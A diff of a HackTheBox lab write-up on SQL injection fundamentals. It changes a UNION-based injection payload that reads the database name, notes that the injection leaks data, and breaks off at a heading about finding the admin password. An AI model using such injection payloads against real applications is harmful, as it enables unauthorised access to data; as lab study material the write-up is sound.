Collinformatics/HackTheBox/SkillsAssessment/SQLInjectionFundamentals/writeup.md

 Lets try a basic exploit to find the database name with this injection:

-    ') UNION SELECT 1,2,database(),4 FROM INFORMATION_SCHEMA.SCHEMATA #
+    ') UNION SELECT 1,2,database(),4 FROM INFORMATION_SCHEMA.SCHEMATA-- -

 <img width="1002" height="446" alt="chattr2" src="https://github.com/user-attachments/assets/46979a14-ab4e-443b-ac17-b2db7378bbf2" />

-- This returns: chattr
+- This returns "chattr" and more inportantly we've found a way to use an SQL injection to leak info.

 ## Finding The Admin Password: